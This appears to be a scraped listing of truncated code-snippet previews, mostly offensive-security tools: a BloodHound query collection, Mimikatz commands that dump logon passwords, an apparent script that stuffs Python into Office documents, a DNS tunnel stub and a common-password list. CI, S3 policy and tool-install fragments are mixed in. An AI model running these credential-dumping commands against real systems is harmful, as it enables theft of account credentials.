Collection of BloodHound Cypher Query Examples
- I- Raw
- II- Built-In
- III- Custom
- IV- DB Manipulation
- V- REST API (PowerShell)
#general | |
privilege::debug | |
log | |
log customlogfilename.log | |
#sekurlsa | |
sekurlsa::logonpasswords | |
sekurlsa::logonPasswords full |
# Copy and paste the following snippet, including brackets, into the Terminal | |
( | |
set -e; | |
cd "$(mktemp -d)" | |
curl -LO 'http://www.newosxbook.com/tools/jtool2.tgz' | |
tar -x -f jtool2.tgz | |
lipo jtool2 -thin x86_64 -output jtool2.x86_64 | |
lipo disarm -thin x86_64 -output disarm.x86_64 | |
sudo mkdir -p /usr/local/bin |
{ | |
"30523382": { | |
"className": "Proxy", | |
"data": { | |
"bypassFPForPAC": true, | |
"color": "#f57575", | |
"configUrl": "", | |
"credentials": "U2FsdGVkX1+tf3lvD5TBClW2UUSZAT4AWsCo/i0kU2M=", | |
"cycle": false, | |
"enabled": true, |
Password | Occurrence | |
_____________|____________ | |
123456 |5377325 | |
123456789 |1962160 | |
password |1190534 | |
qwerty |869629 | |
12345678 |703220 | |
12345 |679886 | |
123123 |460430 | |
1234 |448199 |
#!/usr/bin/python3 | |
import sys | |
import os | |
import zipfile | |
import tempfile | |
from xml.etree import ElementTree | |
from shutil import copyfile | |
def stuffer(py_file, doc_file): |
using System; | |
using System.Net.Sockets; | |
using System.Net; | |
namespace DnsTunnel | |
{ | |
class Program | |
{ | |
static void OpenTunnel(int listenerPort, string targetHost, int targetPort) | |
{ |
import json | |
import re | |
import sys | |
scopes = [] | |
f = sys.stdin | |
if len(sys.argv) == 2: | |
f = open(sys.argv[1]) | |
scopes_defs = [x.strip().lower() for x in f.readlines() if len(x.strip())] |
Collection of BloodHound Cypher Query Examples
name: CI | |
on: [push] | |
jobs: | |
build: | |
runs-on: ubuntu-latest | |
strategy: | |
matrix: |
S3 PutObject Role | |
--- | |
{ | |
"Version": "2012-10-17", | |
"Statement": [ | |
{ | |
"Sid": "VisualEditor0", | |
"Effect": "Allow", | |
"Action": "s3:PutObject", | |
"Resource": "*" |